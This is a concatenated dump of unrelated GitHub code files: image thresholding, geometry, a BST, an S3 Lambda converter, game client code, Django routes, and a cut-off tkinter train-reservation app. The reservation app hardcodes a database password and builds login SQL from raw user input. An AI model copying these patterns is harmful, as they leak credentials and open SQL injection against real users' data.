]\n","repo_name":"RababKM/Recoms","sub_path":"main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32408571593","text":"import cv2 as cv \nimport numpy as np \n\nimg = cv.imread('../Images/thresholding.png',0)\ncv.imshow('Before binarization',img)\ncv.waitKey(0)\n\nthresh, binarized = cv.threshold(img,0,255,cv.THRESH_BINARY+cv.THRESH_OTSU)\n\n#Threshold value as found by Otsu's Algorithm\nprint(\"Threshold value: \",thresh)\n\ncv.imshow('Binarized Image',binarized)\ncv.waitKey(0)\n","repo_name":"mahirjain25/Digital-Image-Processing","sub_path":"Thresholding/otsu.py","file_name":"otsu.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22056181837","text":"import numpy as np\n\ndef vol_tehrahedron(poly):\n    \"\"\"volume of an irregular tetrahedron\"\"\"\n    a = np.array(poly[0])\n    b = np.array(poly[1])\n    c = np.array(poly[2])\n    d = np.array(poly[3])\n    return abs(np.dot((a-d), np.cross((b-d),(c-d))) / 6)\n\ndef central_p(poly1,poly2):\n    central_point = np.array([0.0, 0.0, 0.0])\n    for i in range(len(poly1)):\n        central_point += np.array(poly1[i]) + np.array(poly2[i])\n    return central_point / (len(poly1)) / 2\n\ndef vol(poly1,poly2):\n    \"\"\"volume of a zone defined by two polygon bases\"\"\"\n    c_point = central_p(poly1, poly2)\n    c_point = (c_point[0], c_point[1], 
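\n        # cast the numpy centroid back to a plain (x, y, z) tuple to match the polygon vertices\n        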
c_point[2])\n vol_therah = 0\n N = len(poly1)\n poly1.append(poly1[0])\n poly2.append(poly2[0])\n for i in range(N-2):\n # the upper part\n tehrahedron = [c_point,poly1[0], poly1[i+1], poly1[i+2]]\n vol_therah += vol_tehrahedron(tehrahedron)\n # the bottom part\n tehrahedron = [c_point,poly2[0], poly2[i+1], poly2[i+2]]\n vol_therah += vol_tehrahedron(tehrahedron)\n # the middle part\n for i in range(N):\n tehrahedron = [c_point, poly1[i], poly2[i], poly2[i+1]]\n vol_therah += vol_tehrahedron(tehrahedron)\n tehrahedron = [c_point, poly1[i], poly1[i+1], poly2[i]]\n vol_therah += vol_tehrahedron(tehrahedron)\n return vol_therah","repo_name":"cmiller8/eppy","sub_path":"eppy/geometry/volume_zone.py","file_name":"volume_zone.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"42804431675","text":"import os\nimport re\nimport PyPDF2\nfrom langchain.callbacks import get_openai_callback\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import HumanMessage\nfrom config.config import TOKEN\n\n# Set the OpenAI API key\nos.environ['OPENAI_API_KEY'] = TOKEN\n\n# Open the PDF file\nwith open('../input/ABC123_verificacion_vehicular.pdf', 'rb') as pdfFileObj:\n # Create a PDF reader object\n pdfReader = PyPDF2.PdfReader(pdfFileObj)\n\n # Get the number of pages in the PDF file\n print(f\"Number of pages: {len(pdfReader.pages)}\")\n\n # Get the first page of the PDF\n pageObj = pdfReader.pages[0]\n\n # Extract the text from the page and remove extra spaces between characters\n text = re.sub(r\"(?<=\\w) (?=\\w)\", \"\", pageObj.extract_text())\n\n # Search for the license plate in the text\n match = re.search(r'(placa|Número de Placa|patente|license_plate)(.{0,30})', text, re.IGNORECASE | re.DOTALL)\n if match:\n segment = match.group(0) # The license plate and the following 30 characters\n else:\n print(\"No license plate found in the document.\")\n exit(1)\n\n# Construct the content for the chat\ncontent = \"You are a text interpreter API. Your responses should always be in JSON format, using the following \" \\\n \"structure: {\\\"result\\\": \\\"$result\\\"}. 
Now, please search for the license_plate (also called placa in Spanish) in \" \\\n \"the following text: \" + segment\n\n# Initialize the chat model\nchat = ChatOpenAI(temperature=0, model_name=\"gpt-3.5-turbo\")\n\n# Use the OpenAI callback to print the chat response and callback\nwith get_openai_callback() as cb:\n print(chat([HumanMessage(content=content)]))\n print(cb)\n","repo_name":"ldmarz/nlp-scripts","sub_path":"src/text_from_pdf_extractor.py","file_name":"text_from_pdf_extractor.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33593164302","text":"class Node:\n def __init__(self, data=None, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\nclass BST:\n def __init__(self):\n self.root = None\n self.size = 0\n\n def insert(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n else:\n current = self.root\n while True:\n if item < current.data:\n if current.left is None:\n current.left = node\n break\n else:\n current = current.left\n else:\n if current.right is None:\n current.right = node\n break\n else:\n current = current.right\n self.size += 1\n\n def delete(self, item):\n # Only shrink the size when the item is actually present;\n # decrementing inside _delete ran once per recursion level.\n if self.search(item):\n self.root = self._delete(self.root, item)\n self.size -= 1\n\n def _delete(self, node, item):\n if node is None:\n return None\n if item < node.data:\n node.left = self._delete(node.left, item)\n elif item > node.data:\n node.right = self._delete(node.right, item)\n else:\n if node.left is None:\n return node.right\n elif node.right is None:\n return node.left\n else:\n min_node = self._find_min(node.right)\n node.data = min_node.data\n node.right = self._delete(node.right, min_node.data)\n return node\n\n def _find_min(self, node):\n while node.left is not None:\n node = node.left\n return node\n\n def search(self, item):\n current = self.root\n while current is not None:\n if item == current.data:\n return True\n elif item < current.data:\n current = current.left\n else:\n current = current.right\n return False\n\n def get_size(self):\n # The size attribute assigned in __init__ shadows any method named size,\n # so the accessor needs a distinct name.\n return self.size\n","repo_name":"nanduskumar33/pythonAssignments","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37124679687","text":"import json\nimport urllib.parse\nimport boto3\nimport csv\nprint('Loading function')\ns3 = boto3.client('s3')\n\ndef lambda_handler(event, context):\n print(\"Received event: \" + json.dumps(event, indent=2))\n # Get the object from the event and show its content type\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n if \"json\" in key:\n try:\n response = s3.get_object(Bucket=bucket, Key=key)\n response_body = response['Body'].read()\n data = json.loads(response_body.decode('utf-8'))\n Flat_json = flatten_json(data['web-app']) \n write_csv(Flat_json,'|')\n upload_file()\n #write the data into '/tmp' folder\n return response['ContentType']\n except Exception as e:\n print(e)\n print('Error getting object {} from bucket {}. 
Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\n raise e\n \ndef flatten_json(y):\n out = {}\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a],name +a+ '|')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '|')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n \n# Upload the file\ndef upload_file():\n #Method 2: Client.put_object()\n s3 = boto3.resource('s3')\n #try:\n #print('bucketname'+str(bucket))\n s3.Bucket('testingdmsunique').upload_file(r'/tmp/SampleJson.csv', 'SampleJson1.csv')\n #except ClientError as e:\n # logging.error(type(e))\n # return False\n return True\n\ndef write_csv(flat_json,delim):\n data_file = open(r'/tmp/SampleJson.csv', 'w',newline='') \n # create the csv writer object \n csv_writer = csv.writer(data_file) \n # Counter variable used for writing \n # headers to the CSV file \n count = 0\n count2 = 0\n print(data_file)\n \n for f in flat_json: \n if count == 0: \n # Writing headers of CSV file \n header = flat_json.keys()\n csv_writer.writerow(header) \n count += 1 \n # Writing data of CSV file \n for k,v in flat_json.items():\n concat = str(k)+str(delim)+str(v)\n csv_writer.writerow([concat])\n data_file.close()\n \n \n","repo_name":"divadf/dms-fileconv","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74084018922","text":"from direct.directnotify.DirectNotifyGlobal import directNotify\nfrom direct.interval.IntervalGlobal import Sequence, Wait, Func, SoundInterval\nfrom direct.interval.IntervalGlobal import Parallel, LerpPosInterval, LerpQuatInterval, LerpHprInterval\n\nfrom DistributedPlayerToonShared import DistributedPlayerToonShared\nfrom src.coginvasion.toon.DistributedToon import DistributedToon\nfrom src.coginvasion.gags.backpack.Backpack import Backpack\nfrom src.coginvasion.gags import GagGlobals\nfrom src.coginvasion.gui.LaffOMeter import LaffOMeter\nfrom src.coginvasion.hood import LinkTunnel\nfrom src.coginvasion.globals import ChatGlobals\nfrom src.coginvasion.phys import PhysicsUtils\nfrom src.coginvasion.distributed import AdminCommands\n\nclass DistributedPlayerToon(DistributedToon, DistributedPlayerToonShared):\n notify = directNotify.newCategory('DistributedPlayerToon')\n \n def __init__(self, cr):\n try:\n self.DistributedPlayerToon_initialized\n return\n except:\n self.DistributedPlayerToon_initialized = 1\n DistributedToon.__init__(self, cr)\n DistributedPlayerToonShared.__init__(self)\n self.role = None\n self.ghost = 0\n self.puInventory = []\n self.equippedPU = -1\n self.backpack = Backpack(self)\n self.battleMeter = None\n self.headMeter = None\n self.firstTimeChangingHP = True\n \n # Quest-related variables.\n self.quests = \"\"\n self.tier = None\n self.questHistory = None\n \n self.busy = 1\n self.friends = None\n self.tutDone = 0\n self.hoodsDiscovered = []\n self.teleportAccess = []\n self.lastHood = 0\n self.defaultShard = 0\n self.tunnelTrack = None\n self.trackExperience = dict(GagGlobals.DefaultTrackExperiences)\n \n self.takeDmgSfx = base.audio3d.loadSfx('phase_5/audio/sfx/tt_s_ara_cfg_toonHit.ogg')\n base.audio3d.attachSoundToObject(self.takeDmgSfx, self)\n return\n \n def getHealth(self):\n return DistributedPlayerToonShared.getHealth(self)\n \n def getMaxHealth(self):\n return DistributedPlayerToonShared.getMaxHealth(self)\n \n def 
stopSmooth(self):\n DistributedToon.stopSmooth(self)\n localAvatarReachable = (hasattr(base, 'localAvatar') and base.localAvatar)\n if localAvatarReachable and self.doId != base.localAvatar.doId:\n self.resetTorsoRotation()\n\n def handleHealthChange(self, hp, oldHp):\n if hp < oldHp and not self.firstTimeChangingHP:\n # We took damage, make oof sound.\n self.takeDmgSfx.play()\n\n def setHealth(self, health):\n self.handleHealthChange(health, self.getHealth())\n DistributedToon.setHealth(self, health)\n if self.doId != base.localAvatar.doId:\n if not self.firstTimeChangingHP:\n if health < self.getMaxHealth():\n if not self.headMeter:\n self.__makeHeadMeter()\n else:\n self.__updateHeadMeter()\n else:\n self.__removeHeadMeter()\n self.firstTimeChangingHP = False\n\n def announceHealthAndPlaySound(self, level, hp, extraId = -1):\n DistributedToon.announceHealth(self, level, hp, extraId)\n hpSfx = base.audio3d.loadSfx('phase_11/audio/sfx/LB_toonup.ogg')\n base.audio3d.attachSoundToObject(hpSfx, self)\n SoundInterval(hpSfx, node = self).start()\n del hpSfx\n \n def setChat(self, chat):\n chat = ChatGlobals.filterChat(chat, self.animal)\n DistributedToon.setChat(self, chat)\n \n def goThroughTunnel(self, toZone, inOrOut, requestStatus = None):\n # inOrOut: 0 = in; 1 = out\n\n if self.tunnelTrack:\n self.ignore(self.tunnelTrack.getDoneEvent())\n self.tunnelTrack.finish()\n self.tunnelTrack = None\n\n linkTunnel = LinkTunnel.getTunnelThatGoesToZone(toZone)\n if not linkTunnel:\n return\n self.tunnelTrack = Parallel(name = self.uniqueName('Place.goThroughTunnel'))\n\n if inOrOut == 0:\n # Going in a tunnel!\n pivotPoint = linkTunnel.inPivotPoint\n pivotPointNode = linkTunnel.tunnel.attachNewNode('tunnelPivotPoint')\n pivotPointNode.setPos(pivotPoint)\n pivotPointNode.setHpr(linkTunnel.inPivotStartHpr)\n \n x, y, z = self.getPos(render)\n surfZ = PhysicsUtils.getNearestGroundSurfaceZ(self, self.getHeight() + self.getHeight() / 2.0)\n \n if not surfZ == -1:\n # Let's use the ray-tested surface z-point instead so we don't come out of the tunnel hovering.\n # This is just in case the user jumped into the tunnel, which in that case would mean that they are\n # airborne and we can't depend on their current Z value.\n z = surfZ\n \n if base.localAvatar.doId == self.doId:\n doneMethod = self._handleWentInTunnel\n extraArgs = [requestStatus]\n base.localAvatar.walkControls.setCollisionsActive(0, andPlaceOnGround=1)\n self.resetHeadHpr(override = True)\n camera.wrtReparentTo(linkTunnel.tunnel)\n currCamPos = camera.getPos()\n currCamHpr = camera.getHpr()\n tunnelCamPos = linkTunnel.camPos\n tunnelCamHpr = linkTunnel.camHpr\n camera.setPos(tunnelCamPos)\n camera.setHpr(tunnelCamHpr)\n self.tunnelTrack.append(LerpPosInterval(\n camera,\n duration = 0.7,\n pos = tunnelCamPos,\n startPos = currCamPos,\n blendType = 'easeOut'\n ))\n self.tunnelTrack.append(LerpQuatInterval(\n camera,\n duration = 0.7,\n quat = tunnelCamHpr,\n startHpr = currCamHpr,\n blendType = 'easeOut'\n ))\n\n self.wrtReparentTo(pivotPointNode)\n self.setPos(x, y, z)\n self.resetTorsoRotation()\n self.stopLookAround()\n \n if linkTunnel.__class__.__name__ == \"SafeZoneLinkTunnel\":\n self.setHpr(180, 0, 0)\n else:\n self.setHpr(0, 0, 0)\n \n exitSeq = Sequence(Func(self.loop, 'run'))\n if base.localAvatar.doId == self.doId:\n exitSeq.append(Wait(2.0))\n exitSeq.append(Func(base.transitions.irisOut))\n self.tunnelTrack.append(exitSeq)\n self.tunnelTrack.append(Sequence(\n LerpHprInterval(\n pivotPointNode,\n duration = 2.0,\n hpr = 
linkTunnel.inPivotEndHpr,\n startHpr = linkTunnel.inPivotStartHpr,\n ), LerpPosInterval(\n pivotPointNode,\n duration = 1.0,\n pos = (linkTunnel.inPivotEndX, pivotPointNode.getY(), pivotPointNode.getZ()),\n startPos = (linkTunnel.inPivotStartX, pivotPointNode.getY(), pivotPointNode.getZ())\n ), Func(self.reparentTo, hidden)))\n elif inOrOut == 1:\n \n # Going out!\n pivotPoint = linkTunnel.outPivotPoint\n pivotPointNode = linkTunnel.tunnel.attachNewNode('tunnelPivotPoint')\n pivotPointNode.setPos(pivotPoint)\n pivotPointNode.setHpr(linkTunnel.outPivotStartHpr)\n \n exitSeq = Sequence()\n \n if base.localAvatar.doId == self.doId:\n base.localAvatar.walkControls.setCollisionsActive(0, andPlaceOnGround=1)\n base.localAvatar.detachCamera()\n camera.reparentTo(linkTunnel.tunnel)\n tunnelCamPos = linkTunnel.camPos\n tunnelCamHpr = linkTunnel.camHpr\n camera.setPos(tunnelCamPos)\n camera.setHpr(tunnelCamHpr)\n doneMethod = self._handleCameOutTunnel\n extraArgs = []\n \n exitSeq.append(Func(base.transitions.irisIn))\n else:\n self.stopSmooth()\n \n self.reparentTo(pivotPointNode)\n self.setHpr(linkTunnel.toonOutHpr)\n self.setPos(linkTunnel.toonOutPos)\n \n seq = Sequence(\n Func(self.loop, 'run'),\n LerpPosInterval(\n pivotPointNode,\n duration = 1.0,\n pos = (linkTunnel.outPivotEndX, pivotPointNode.getY(), pivotPointNode.getZ()),\n startPos = (linkTunnel.outPivotStartX, pivotPointNode.getY(), pivotPointNode.getZ())\n ),\n LerpHprInterval(\n pivotPointNode,\n duration = 2.0,\n hpr = linkTunnel.outPivotEndHpr,\n startHpr = linkTunnel.outPivotStartHpr,\n )\n )\n if base.localAvatar.doId != self.doId:\n seq.append(Func(self.startSmooth))\n seq.append(Func(self.wrtReparentTo, render))\n exitSeq.append(seq)\n self.tunnelTrack.append(exitSeq)\n\n if base.localAvatar.doId == self.doId:\n self.tunnelTrack.setDoneEvent(self.tunnelTrack.getName())\n self.acceptOnce(self.tunnelTrack.getDoneEvent(), doneMethod, extraArgs)\n\n self.tunnelTrack.start()\n \n def setDefaultShard(self, shardId):\n self.defaultShard = shardId\n\n def getDefaultShard(self):\n return self.defaultShard\n\n def setLastHood(self, zoneId):\n self.lastHood = zoneId\n\n def b_setLastHood(self, zoneId):\n self.sendUpdate('setLastHood', [zoneId])\n self.setLastHood(zoneId)\n\n def getLastHood(self):\n return self.lastHood\n\n def setTeleportAccess(self, array):\n self.teleportAccess = array\n\n def getTeleportAccess(self):\n return self.teleportAccess\n\n def setHoodsDiscovered(self, array):\n self.hoodsDiscovered = array\n\n def b_setHoodsDiscovered(self, array):\n self.sendUpdate('setHoodsDiscovered', [array])\n self.setHoodsDiscovered(array)\n\n def getHoodsDiscovered(self):\n return self.hoodsDiscovered\n\n def setTutorialCompleted(self, value):\n self.tutDone = value\n\n def getTutorialCompleted(self):\n return self.tutDone\n\n def setFriendsList(self, friends):\n self.friends = friends\n\n def getFriendsList(self):\n return self.friends\n\n def setBusy(self, busy):\n self.busy = busy\n\n def getBusy(self):\n return self.busy\n\n def setTier(self, tier):\n self.tier = tier\n\n def getTier(self):\n return self.tier\n\n def setQuestHistory(self, array):\n self.questHistory = array\n\n def getQuestHistory(self):\n return self.questHistory\n\n def setQuests(self, dataStr):\n self.quests = dataStr\n\n def getQuests(self):\n return self.quests\n\n def maybeMakeHeadMeter(self):\n if base.localAvatar.doId != self.doId:\n if self.getHealth() < self.getMaxHealth():\n if not self.headMeter:\n self.__makeHeadMeter()\n\n def 
__makeHeadMeter(self):\n self.headMeter = LaffOMeter(forRender = True)\n r, g, b, _ = self.getHeadColor()\n animal = self.getAnimal()\n maxHp = self.getMaxHealth()\n hp = self.getHealth()\n self.headMeter.generate(r, g, b, animal, maxHP = maxHp, initialHP = hp)\n self.headMeter.reparentTo(self)\n self.headMeter.setZ(self.getHeight() + 2)\n self.headMeter.setScale(0.4)\n self.headMeter.setBillboardAxis()\n self.__updateHeadMeter()\n\n def __removeHeadMeter(self):\n if self.headMeter:\n self.headMeter.disable()\n self.headMeter.delete()\n self.headMeter = None\n\n def __updateHeadMeter(self):\n if self.headMeter:\n self.headMeter.updateMeter(self.getHealth())\n \n def d_createBattleMeter(self):\n self.sendUpdate('makeBattleMeter', [])\n\n def b_createBattleMeter(self):\n self.makeBattleMeter()\n self.d_createBattleMeter()\n\n def d_cleanupBattleMeter(self):\n self.sendUpdate('destroyBattleMeter', [])\n\n def b_cleanupBattleMeter(self):\n self.destroyBattleMeter()\n self.d_cleanupBattleMeter()\n\n def makeBattleMeter(self):\n if self.getHealth() < self.getMaxHealth():\n if not self.battleMeter:\n self.battleMeter = LaffOMeter()\n r, g, b, _ = self.getHeadColor()\n animal = self.getAnimal()\n maxHp = self.getMaxHealth()\n hp = self.getHealth()\n self.battleMeter.generate(r, g, b, animal, maxHP = maxHp, initialHP = hp)\n self.battleMeter.reparentTo(self)\n self.battleMeter.setZ(self.getHeight() + 5)\n self.battleMeter.setScale(0.5)\n self.battleMeter.start()\n\n def destroyBattleMeter(self):\n if self.battleMeter:\n self.battleMeter.stop()\n self.battleMeter.disable()\n self.battleMeter.delete()\n self.battleMeter = None\n\n def setEquippedPU(self, index):\n self.equippedPU = index\n\n def getEquippedPU(self):\n return self.equippedPU\n\n def setPUInventory(self, array):\n self.puInventory = array\n\n def getPUInventory(self):\n return self.puInventory\n\n def setGhost(self, value):\n self.ghost = value\n self.handleGhost(value)\n\n def d_setGhost(self, value):\n self.sendUpdate(\"setGhost\", [value])\n\n def b_setGhost(self, value):\n self.d_setGhost(value)\n self.setGhost(value)\n\n def getGhost(self):\n return self.ghost\n\n def getBackpack(self):\n return self.backpack\n\n def setEquippedAttack(self, attackID):\n try: \n self.backpack.setCurrentGag(attackID) \n except:\n # If we couldn't do this, it means that the avatar was most likely disabled. 
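The backpack may already have been torn down by disable(), so the failed lookup is deliberately ignored.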
\n pass\n DistributedToon.setEquippedAttack(self, attackID)\n\n def getCurrentGag(self):\n return self.getEquippedAttack()\n\n def setLoadout(self, gagIds):\n if self.backpack:\n loadout = []\n for i in range(len(gagIds)):\n gagId = gagIds[i]\n gag = self.backpack.getGagByID(gagId)\n if gag:\n loadout.append(gag)\n self.backpack.setLoadout(loadout)\n \n def setBackpackAmmo(self, netString):\n if len(self.attackIds) != 0 or len(self.attacks) != 0:\n self.cleanupAttacks()\n self.clearAttackIds()\n return self.backpack.updateSuppliesFromNetString(netString)\n \n def getBackpackAmmo(self):\n if self.backpack:\n return self.backpack.netString\n return GagGlobals.getDefaultBackpack().toNetString()\n \n def setTrackExperience(self, netString):\n self.trackExperience = GagGlobals.getTrackExperienceFromNetString(netString)\n if GagGlobals.processTrackData(self.trackExperience, self.backpack) and self == base.localAvatar:\n if base.localAvatar.invGui:\n base.localAvatar.reloadInvGui()\n \n def getTrackExperience(self):\n return GagGlobals.trackExperienceToNetString(self.trackExperience)\n\n def updateAttackAmmo(self, gagId, ammo, maxAmmo, ammo2, maxAmmo2, clip, maxClip):\n if self.useBackpack():\n self.backpack.setSupply(gagId, ammo)\n else:\n DistributedToon.updateAttackAmmo(self, gagId, ammo, maxAmmo, ammo2, maxAmmo2, clip, maxClip)\n\n def setMoney(self, money):\n self.money = money\n\n def getMoney(self):\n return self.money\n\n def setAccessLevel(self, value):\n prevLevel = self.getAccessLevel()\n self.role = AdminCommands.Roles.get(value, None)\n \n if prevLevel != AdminCommands.NoAccess:\n # Let's remove any tokens that already are showing up.\n DistributedToon.removeAdminToken(self)\n \n if self.role:\n # Let's put a new token above our head.\n DistributedToon.setAdminToken(self, self.role.token)\n\n def getAccessLevel(self):\n return AdminCommands.NoAccess if not self.role else self.role.accessLevel\n \n def disable(self):\n base.audio3d.detachSound(self.takeDmgSfx)\n self.takeDmgSfx = None\n if self.tunnelTrack:\n self.ignore(self.tunnelTrack.getDoneEvent())\n self.tunnelTrack.finish()\n self.tunnelTrack = None\n self.role = None\n self.ghost = None\n self.puInventory = None\n self.equippedPU = None\n if self.backpack:\n self.backpack.cleanup()\n self.backpack = None\n self.firstTimeChangingHP = None\n self.quests = None\n self.tier = None\n self.questHistory = None\n self.busy = None\n self.friends = None\n self.tutDone = None\n self.hoodsDiscovered = None\n self.teleportAccess = None\n self.lastHood = None\n self.defaultShard = None\n self.trackExperience = None\n self.__removeHeadMeter()\n self.destroyBattleMeter()\n DistributedToon.disable(self)\n \n def delete(self):\n try:\n self.DistributedPlayerToon_deleted\n except:\n self.DistributedPlayerToon_deleted = 1\n DistributedPlayerToonShared.delete(self)\n del self.takeDmgSfx\n del self.tunnelTrack\n del self.role\n del self.ghost\n del self.puInventory\n del self.equippedPU\n del self.backpack\n del self.firstTimeChangingHP\n del self.quests\n del self.tier\n del self.questHistory\n del self.busy\n del self.friends\n del self.tutDone\n del self.hoodsDiscovered\n del self.teleportAccess\n del self.lastHood\n del self.defaultShard\n del self.trackExperience\n del self.battleMeter\n del self.headMeter\n DistributedToon.delete(self)\n 
return\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/toon/DistributedPlayerToon.py","file_name":"DistributedPlayerToon.py","file_ext":"py","file_size_in_byte":18496,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"} +{"seq_id":"26067499157","text":"from rest_framework import routers\nfrom accounts import views as accounts_views\nfrom django.conf.urls import url, include\nfrom django.urls import path\n\nrouter = routers.DefaultRouter()\nrouter.register(r'register', accounts_views.SignupViewSet, basename='register'),\nrouter.register(r'book_list', accounts_views.BookList, basename='book_list'),\nrouter.register(r'add_into_book_list', accounts_views.AddBook, basename='add_into_book_list'),\nrouter.register(r'delete_book', accounts_views.DeleteBook, basename='delete_book'),\nrouter.register(r'book_details', accounts_views.BookDetails, basename='book_details'),\nrouter.register(r'update_book_details', accounts_views.UpdateBookDetails, basename='update_book_details'),\n\nurlpatterns = [\n url(r'', include(router.urls)),\n url(r'^login', accounts_views.LoginViewSet.as_view(), name=\"login\"),\n]\n","repo_name":"prajktaraje/keywordio","sub_path":"DjangoBackend/LibraryManagementSystemBackend/rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32920174625","text":"#Arthi Nithi, Anjani Agrawal, Alan Chiang, Alaap Murali\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter.ttk import *\nimport pymysql\nimport calendar\nimport datetime\nfrom math import *\nimport time\nclass Phase_three:\n def __init__(self,primaryWin):\n self.primaryWin = primaryWin\n self.Login()\n self.results1 = []\n self.entrys=[]\n self.newUserWindow = Toplevel()\n #self.Register()\n self.newUserWindow.title(\"New User Registration\")\n self.newUserWindow.withdraw()\n\n self.primaryWindow = Toplevel()\n self.primaryWindow.title(\"Welcome \"+self.username.get())\n self.primaryWindow.withdraw()\n\n self.schoolInfoWin= Toplevel()\n self.schoolInfoWin.title(\"Add School Info\")\n self.schoolInfoWin.withdraw()\n\n self.trainSchWin= Toplevel()\n self.trainSchWin.title(\"View Train Schedule\")\n self.trainSchWin.withdraw()\n\n self.scheduleWin= Toplevel()\n self.scheduleWin.title(\"View Train Schedule\")\n self.scheduleWin.withdraw()\n\n self.findAvailWindow= Toplevel()\n self.findAvailWindow.title(\"Search Train\")\n self.findAvailWindow.withdraw()\n\n self.departureWin = Toplevel()\n self.departureWin.title(\"Select Departure\")\n self.departureWin.withdraw()\n\n self.passengerInfoWin = Toplevel()\n self.passengerInfoWin.title(\"Travel Extras & Passenger Info\")\n self.passengerInfoWin.withdraw()\n\n self.reservationWin = Toplevel()\n self.reservationWin.title(\"Make Reservation\")\n self.reservationWin.withdraw()\n\n self.paymentIWin = Toplevel()\n self.paymentIWin.title(\"Add Card\")\n self.paymentIWin.withdraw()\n\n self.paymentIWin2 = Toplevel()\n self.paymentIWin2.title(\"Delete Card\")\n self.paymentIWin2.withdraw()\n\n self.confirm = Toplevel()\n self.confirm.title(\"Confirmation\")\n self.confirm.withdraw()\n\n self.updateWin = Toplevel()\n self.updateWin.title(\"Update Reservation\")\n self.updateWin.withdraw()\n\n self.updateWin2 = Toplevel()\n self.updateWin2.title(\"Update Reservation\")\n self.updateWin2.withdraw()\n\n self.updateWin3 = Toplevel()\n self.updateWin3.title(\"Update 
Reservation\")\n self.updateWin3.withdraw()\n\n self.cancelWin = Toplevel()\n self.cancelWin.title(\"Cancel Reservation\")\n self.cancelWin.withdraw()\n\n self.cancelWin2 = Toplevel()\n self.cancelWin2.title(\"Cancel Reservation\")\n self.cancelWin2.withdraw()\n\n self.viewReviewWin = Toplevel()\n self.viewReviewWin.title(\"View review\")\n self.viewReviewWin.withdraw()\n\n self.viewReviewWin2 = Toplevel()\n self.viewReviewWin2.title(\"View review\")\n self.viewReviewWin2.withdraw()\n\n self.giveReviewWin = Toplevel()\n self.giveReviewWin.title(\"Give Review\")\n self.giveReviewWin.withdraw()\n\n self.viewRevenueReport = Toplevel()\n self.viewRevenueReport.title(\"View Revenue Report\")\n self.viewRevenueReport.withdraw()\n\n self.viewpopRRWin = Toplevel()\n self.viewpopRRWin.title(\"View Popular Route Report\")\n self.viewpopRRWin.withdraw()\n\n def Connect(self):\n try:\n db = pymysql.connect(host=\"academic-mysql.cc.gatech.edu\", user=\"cs4400_Team_48\", passwd=\"dwet2rPC\",db=\"cs4400_Team_48\")\n return db\n except:\n messagebox.showerror(\"Error\", \"Check Internet Connection\")\n\n def Login(self):\n self.primaryWin.title(\"Login\")\n frame = Frame(self.primaryWin)\n frame.pack()\n frame2 = Frame(self.primaryWin)\n frame2.pack()\n\n label1 = Label(frame,text = \"Username\")\n label2 = Label(frame,text =\"Password\")\n label1.grid(row = 0, column = 0,sticky=E)\n label2.grid(row = 1, column = 0,sticky=E)\n self.username = StringVar()\n self.password = StringVar()\n entry1 = Entry(frame, textvariable = self.username, width = 30)\n entry1.grid(row = 0, column = 1)\n entry2 = Entry(frame, textvariable = self.password, width = 30)\n entry2.grid(row = 1, column = 1)\n\n b1=Button(frame2, text =\"Login\", command=self.loginCredentials)\n b1.pack(side=LEFT)\n b2=Button(frame2, text =\"Register\", command= self.switchToRegister)\n b2.pack(side=LEFT)\n\n def loginCredentials(self):\n if self.username.get() == \"\" or self.password.get() == \"\":\n messagebox.showerror(\"Error\", \"Invalid input\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Username FROM CUSTOMER \\\n WHERE (CUSTOMER.Username = '%s' AND (SELECT Password FROM USER WHERE CUSTOMER.Username = USER.Username) = '%s')\" % (self.username.get(), self.password.get())\n cursor.execute(query)\n result1 = cursor.fetchall()\n query = \"SELECT Username FROM MANAGER \\\n WHERE (MANAGER.Username = '%s' AND (SELECT Password FROM USER WHERE MANAGER.Username = USER.Username) = '%s')\" % (self.username.get(), self.password.get())\n\n cursor.execute(query)\n result2 = cursor.fetchall()\n\n if len(result1) != 0:\n self.custOrManag = \"customer\"\n for row in result1:\n self.name = row[0]\n self.switchtoMainMenu()\n elif len(result2) != 0:\n self.custOrManag = \"manager\"\n for row in result2:\n self.name = row[0]\n self.switchtoMainMenu()\n else:\n messagebox.showerror(\"Error\", \"Invalid username or password\")\n\n def mainMenu(self):\n self.primaryWindow = Toplevel()\n self.primaryWindow.title(\"Choose Functionality \")\n buttonsFrame = Frame(self.primaryWindow)\n buttonsFrame.pack()\n if self.custOrManag == \"customer\":\n b1 = Button(buttonsFrame, text =\"View Train Schedule\", command = self.trainSchedule)\n b1.grid(row = 0, column = 0, columnspan = 2, sticky = EW)\n b2 = Button(buttonsFrame, text =\"Make a new reservation\", command = self.searchTrain)\n b2.grid(row = 1, column = 0, columnspan = 2, sticky = EW)\n b3 = Button(buttonsFrame, text =\"Update a reservation\", command = 
